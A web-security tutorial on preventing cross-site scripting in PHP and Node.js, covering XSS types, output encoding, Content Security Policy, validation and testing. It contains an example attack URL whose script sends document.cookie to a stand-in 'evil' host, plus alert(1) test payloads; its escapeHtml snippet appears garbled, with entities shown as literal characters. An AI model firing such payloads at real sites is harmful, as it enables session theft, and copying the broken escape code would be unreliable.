Preventing XSS (Cross-Site Scripting) in PHP and Node.js
Cross-site scripting (XSS) is OWASP's third-most-common web application flaw. The attack surface is wider than most developers realise — every user input that eventually reaches a browser is a potential vector. This guide covers the three XSS types, the correct output-encoding defences in PHP and Node.js, and how Content Security Policy acts as a second line of defence.
What XSS is and why it matters
XSS happens when user-supplied content ends up in a page's HTML, CSS, or JavaScript without being properly encoded for that context — letting the attacker inject code that the victim's browser executes.
A single working XSS on a site with session cookies can:
- Steal session cookies → full account takeover
- Read any data the user can read (private messages, admin panels)
- Perform any action as the user (transfer funds, change email, delete posts)
- Pivot to CSRF by reading CSRF tokens from the page
- Serve malware to visitors
XSS and SQL injection share a root cause: mixing code with data. Different layer, different defence.
The three types
Stored XSS (the worst)
Attacker's payload is saved to the database and served to every visitor who views the page. Think: a comment field, forum post, user profile, product review.
Impact: one submission poisons every viewer of the page forever, until removed.
Reflected XSS
Payload travels in a URL query parameter or form field and is reflected back in the response unescaped. Requires tricking the victim into clicking a link.
Example vulnerability:
echo "Search results for: " . $_GET['q'];Attack URL: /search?q=<script>fetch('//evil/?c='+document.cookie)</script>
DOM-based XSS
Pure client-side — JavaScript reads untrusted input and writes it to the DOM:
document.getElementById('greeting').innerHTML = 'Hello ' + location.hash.substring(1);Attack URL: https://yoursite.com/page#<img src=x onerror=alert(1)>
The server never sees the payload — entirely client-side.
Defence #1: output encoding (the primary defence)
The fix for XSS is: encode output for the context it goes into. Different contexts need different encoders.
| Context | Encoder |
|---|---|
| HTML body text | HTML-escape (< → < etc.) |
| HTML attribute value | HTML-escape + quote-aware |
Inside a URL (href, src) | URL-encode + validate scheme |
| Inside JavaScript | JSON-encode |
| Inside CSS | CSS-escape (rare; use only for user-controlled colour / size values) |
PHP — htmlspecialchars properly
// Bad — attacker can break out of attributes, inject HTML
echo '<a href="' . $url . '">' . $userName . '</a>';
// Correct — encode every dynamic value for its context
echo '<a href="' . htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">'
. htmlspecialchars($userName, ENT_QUOTES | ENT_HTML5, 'UTF-8')
. '</a>';Flags matter:
ENT_QUOTES— encodes both"and'(default only does")ENT_HTML5— use HTML5 named entities'UTF-8'— specify the character set explicitly (avoids encoder errors on non-UTF-8 input)
Template engines typically do this automatically:
- Twig:
{{ var }}auto-escapes;{{ var|raw }}does NOT - Blade (Laravel):
{{ $var }}auto-escapes;{!! $var !!}does NOT — audit every{!! !!} - Smarty:
{$var}auto-escapes if$autoescape = true
Rule: if your template syntax requires extra effort to DISABLE escaping, you're safe by default.
Node.js — by template engine
React / Next.js: JSX auto-encodes any value:
<div>{userName}</div> // safe
<a href={url}>{userName}</a> // safeThe one dangerous API is dangerouslySetInnerHTML (correctly named):
<div dangerouslySetInnerHTML={{ __html: userContent }} /> // DANGEROUSIf you need to render user-provided HTML (rare), sanitise first with DOMPurify:
import DOMPurify from 'dompurify';
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(userHtml) }} />Vue: v-text safe, {{ expr }} safe, v-html dangerous (same principle as React).
Express + template engines:
- EJS:
<%= var %>escapes;<%- var %>does NOT - Handlebars:
{{var}}escapes;{{{var}}}does NOT - Pug:
#{var}escapes;!{var}does NOT
Every popular template engine follows a "safe by default, explicit opt-out" pattern. Use the safe form.
Plain Node.js string building
If you must build HTML yourself:
function escapeHtml(unsafe) {
return unsafe
.replace(/&/g, '&')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/"/g, '"')
.replace(/'/g, ''');
}
const safe = `<div>${escapeHtml(userInput)}</div>`;But really — use a template engine. String-building HTML invites bugs.
Defence #2: Content Security Policy
Even with proper encoding, one missed escape is a vulnerability. CSP is the second line — a browser-enforced policy that blocks inline scripts and external-origin JavaScript that you didn't explicitly allow.
Minimal starter CSP (place in HTTP header or <meta> tag):
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-RANDOM'; object-src 'none'; base-uri 'self'default-src 'self'— only same-origin resources by defaultscript-src 'self' 'nonce-RANDOM'— scripts must be same-origin or carry a nonce you generatedobject-src 'none'— block<object>,<embed>(legacy attack vectors)base-uri 'self'— prevent<base>tag hijack
Deploy CSP in report-only mode first — Content-Security-Policy-Report-Only: ... — monitor report-uri for violations, fix what breaks, then flip to enforcing.
See our Security Headers Explained for full CSP setup with nonces.
Defence #3: input validation (secondary layer)
Not a substitute for output encoding, but a useful reject-early pattern. Validate inputs against strict allowlists:
// Laravel validation
$request->validate([
'username' => 'required|string|alpha_dash|max:50',
'email' => 'required|email|max:255',
'age' => 'required|integer|between:18,120',
]);// Node.js with zod
import { z } from 'zod';
const schema = z.object({
username: z.string().regex(/^[a-zA-Z0-9_]{3,50}$/),
email: z.string().email().max(255),
});
const data = schema.parse(req.body); // throws on invalidFor rich-text user content (blog post bodies, comments with formatting), use an allowlist sanitiser:
- PHP:
HTMLPurifier - JavaScript:
DOMPurifyorsanitize-html
Both take user HTML and strip anything not in an allowlist (like <p>, <b>, <a> with safe attributes), returning safe HTML.
Framework-specific notes
WordPress
esc_html($value)— inside HTML bodyesc_attr($value)— inside HTML attributesesc_url($value)— insidehref,srcesc_js($value)— inside inline JavaScript (rare)wp_kses($value, $allowed_tags)— allow a limited set of HTML tags
WordPress core is well-audited — problems come from third-party plugins mixing echoed values with unsanitised inputs. Audit plugin code before deploying to production sites.
Laravel
{{ $var }}— Blade auto-escapes{!! $var !!}— explicit opt-out, use only with trusted contente($value)— thehtmlspecialcharsshortcut, already applied by Blade{{ }}Str::of($value)->sanitize()— if you need raw-HTML with allowlist
Express + Pug/EJS
Template engines default to escaping. Audit any template that uses the raw-output syntax (<%-, !{, {{{).
Testing for XSS
Safe payloads to try
On a staging copy of your app, enter these into every text field:
<script>alert(1)</script>
"><script>alert(1)</script>
javascript:alert(1)
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
"onmouseover=alert(1)"If any of these produce an alert, you have XSS. If they render as text, encoding is working.
Automated tools
- OWASP ZAP — active scan includes XSS payload injection
- Burp Suite Scanner — Community edition has basic XSS scanning
- XSStrike — command-line XSS tester; use on staging / your own sites only
Static analysis
- PHP:
phpcswith the security rules,psalm --taint-analysis - Node.js:
eslint-plugin-security,semgrepwith XSS rulesets
Common pitfalls
- Encoding at the wrong layer. Database-level escaping is for SQL injection. HTML-level escaping is for XSS. They are different — encode at output, not at storage.
- Double-encoding. If your template engine auto-escapes and you also manually escape, values get double-encoded —
&lt;shows as<in the page instead of<. - Missing `ENT_QUOTES`. Without it,
htmlspecialcharsdoesn't encode single quotes. Attacker breaks out of a single-quoted attribute. - Using `strip_tags` for XSS defence. It removes tags but doesn't escape —
strip_tags("<b>foo</b>")returns"foo", butstrip_tags("foo & bar")returns"foo & bar"which still lets&cause parser issues. - URL validation without scheme check.
javascript:alert(1)passesfilter_var($url, FILTER_VALIDATE_URL). Always checkparse_url($url, PHP_URL_SCHEME)ishttp/https. - Assuming JSON is safe in HTML contexts.
<script>var data = <?= $json ?></script>— if$jsoncontains</script>, the browser closes the script tag early. Usejson_encode($data, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT). - Blocking `<script>` but not event handlers.
<img onerror=alert(1)>doesn't need<script>. You need proper HTML escaping, not substring blocklisting. - User profile picture URLs without validation. An attacker's "profile picture URL" set to
javascript:alert(1)shows in thesrcattribute if unvalidated.
Defence in depth — the four layers
- Input validation — reject obvious attacks early; allowlists
- Output encoding — the primary defence; encode for each context
- Content Security Policy — second line; blocks unintended JavaScript
- Security headers —
X-Content-Type-Options: nosniff,X-XSS-Protection(legacy)
One missed encoding in layer 2 is not automatically a breach if layer 3 (CSP) blocks the injected script. Layered defence is the goal.
Frequently asked questions
Can XSS steal my site's admin session?
Yes, if the session cookie lacks HttpOnly. With HttpOnly set, JavaScript cannot read the cookie — XSS impact is reduced but not eliminated (attacker can still perform actions as the user via fetch requests with the cookie).
Is React safe from XSS by default?
Almost. Props rendered as JSX are auto-encoded. dangerouslySetInnerHTML is the escape hatch — audit every usage. Props passed to href / src attributes with javascript: URIs are also risky unless validated.
What about WYSIWYG editors?
Rich-text editors (TinyMCE, CKEditor) produce HTML that you must store. Sanitise with DOMPurify (client-side before save, or server-side on retrieval) using an allowlist of safe tags. Never just trust WYSIWYG output.
Does CSP replace output encoding?
No. CSP is defence-in-depth, not primary. A well-set CSP catches most XSS that slips through, but a motivated attacker can sometimes bypass CSP. Encode output first; CSP second.
How do I CSP-compliant inline scripts?
Use nonces: server generates random nonce per request, includes in CSP header ('nonce-XYZ') and on every legitimate inline <script nonce="XYZ"> tag. Attacker-injected scripts lack the right nonce and are blocked.
Is `eval()` a XSS risk?
Yes, if you eval() user input. eval('1 + ' + userInput) becomes 1 + <script>alert(1)</script>. Never eval() user input — use JSON.parse() for data, proper parsers for expressions.
What if my framework auto-escapes but I still need to output raw HTML (e.g., blog post body)?
Two safe paths: (1) pre-sanitise with DOMPurify / HTMLPurifier at save time; store only sanitised HTML. Or (2) use Markdown for user input — marked.parse() with sanitise option on. Never unescape HTML → display user input as HTML.
Need help auditing your own code for XSS? [email protected] — our team can review specific templates or template-rendering patterns as a standard support request.